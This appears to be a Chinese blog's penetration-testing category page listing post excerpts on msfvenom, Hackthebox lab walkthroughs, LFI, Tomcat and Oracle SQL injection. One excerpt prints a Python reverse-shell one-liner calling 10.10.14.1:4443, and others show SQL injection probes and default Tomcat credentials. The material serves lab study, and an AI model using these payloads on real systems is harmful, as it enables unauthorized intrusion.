渗透测试
文章平均质量分 59
维基人
坚持原创,坚持分享
展开
-
msfvenon使用整理
参考链接1参考链接2msfvenon生成木马文件:格式:msfvenom -p -a --platform -e -i -b -n -f -o // -e 常用编码 x86/shikata_ga_nai cmd/powershell_base64// -f指指定的可执行文件类型 -o 指定输出地址。msfvenom参数解析1. –p (- -payload-options)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载.原创 2022-01-02 06:50:20 · 302 阅读 · 0 评论 -
Hackthebox::Granny walkthrough
这是一台hackthebox的简单的windows靶机信息收集首先使用nmap进行端口扫描使用nmap进行粗略的漏洞扫描,发现80端口是可以利用的查看80端口在web上的内容查看80端口服务 Microsoft IIS httpd 6.0 是否有什么漏洞使用msf查看使用第二个模块windows/iis/iis_webdav_scstoragepathfromurl进行并成功获得一个shell提权我们需要提权,返回msf中使用post/multi/.原创 2021-12-26 03:28:28 · 1979 阅读 · 0 评论 -
Hackthebox::Bastard walkthrough
BastardBastard是hackthebox上一台难度中等的windows靶机信息收集nmap进行端口扫描,首先扫描前100个容易受到攻击的端口nmap进行更细致的扫描nmap扫描是否存在漏洞至此,nmap向我们反馈了有用的信息:80 http135 msrpc49154 open unknow登录80端口,查看网页信息我们从网页底部可以知道这个CMS是drupal系统,但是我们不知道他的具体版本接下来使用dirsearch进行目录扫描,我尝原创 2021-12-04 12:11:58 · 184 阅读 · 0 评论 -
LFI 漏洞的利用
LFI 漏洞的利用参考链接1参考链接2LFI(本地文件包含漏洞),这篇文章将介绍有关该漏洞的一些利用1、phpinfo 漏洞信息利用将LFI漏洞转变为远程代码执行(RCE)漏洞的竞争条件,服务器端需要满足以下条件:LFI漏洞任何显示PHPInfo()配置输出的脚本脚本下载地址得到脚本后,我们需要修改脚本中的攻击载荷, 使用命令 locate php-reverse 定位可用的php载荷位置/usr/share/laudanum/php/php-reverse-s原创 2021-11-29 23:57:06 · 3190 阅读 · 0 评论 -
Apache Tomcat 漏洞利用
Apache Tomcat 漏洞利用参考链接1参考链接2通过对apache tomcat的枚举和利用,我们可以从中找出漏洞,然后得到shell枚举在 Tomcat6 之前的某些版本中,我们可以使用msf枚举用户:msf> use auxiliary/scanner/http/tomcat_enum常见的得到的用户名与密码是:admin:admintomcat:tomcatadmin:admin:s3cr3ttomcat:s3cr3tadmi原创 2021-11-29 13:43:04 · 2972 阅读 · 0 评论 -
基于Oracle网站的SQL注入
基于Oracle网站的SQL注入参考链接1参考链接2使用 order by 语句查询列数www.vuln-web.com/photo.php?id=1' order by 1--Workingwww.vuln-web.com/photo.php?id=1' order by 10-- www.vuln-web.com/photo.php?id=1' order by 7--Workingwww.vuln-web.com/photo.php?id=1' order by 9--Wor原创 2021-11-26 11:35:24 · 292 阅读 · 0 评论 -
反弹shell脚本
反弹shell及其脚本一、反弹shell的各种姿势pythonpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-原创 2021-11-23 00:15:00 · 3188 阅读 · 0 评论 -
Hackthebox :: optimum反思和总结
Hackthebox :: optimum反思和总结optimum是hackthebox上一台简单的windows靶机反思这台靶机我顺利的找到了突破口,但是msf中的post/multi/recon/local_exploiter_suggester 模块并没有用使用别人提供的windows-exploit-suggester.py 出现了问题,需要pip2总结上一篇靶机的反思与总结中我也提到了post/multi/recon/local_exploiter_suggester 模块原创 2021-11-22 01:26:20 · 1124 阅读 · 0 评论 -
Hackthebox :: Devel反思总结
Hackthebox :: Devel反思总结devel是hackthebox上一台简单的windows靶机,我将对其主要内容进行总结与反思反思对FTP服务的命令不够熟悉对msfvenom制作载荷不够熟,msfvenom中变量lhost和lport后面接 ” = “再接参数总结部分FTP命令.aspx是一个动态网络页面文件扫描的21号FTP端口看到的信息中,Anonymous FTP login allowed代表着允许匿名登录,iisstart.htm 告知我们在msf原创 2021-11-22 01:23:43 · 373 阅读 · 0 评论 -
Hackthebox :: Legacy 反思总结
Hackthebox :: Legacy 反思总结注意,这不是完整的渗透过程,只是总结反思这是一台windows XP的靶机,难易程度为简单,但是我却犯了很多错误nmap查看靶机的漏洞我只是使用了一次,导致原来的两个漏洞只是扫出来了一个漏洞扫描漏洞的时候没有准确的扫描,虽然结果是一样的,但是扫描的时间更长过度借助了msf完成渗透过程,利用python脚本其实也可以总结靶机虽然简单,但是应该谨小慎微nmap应该多次扫描,得到的结果一致才可以,在使用其他扫描工具的时候也应该这样原创 2021-11-21 13:48:30 · 989 阅读 · 0 评论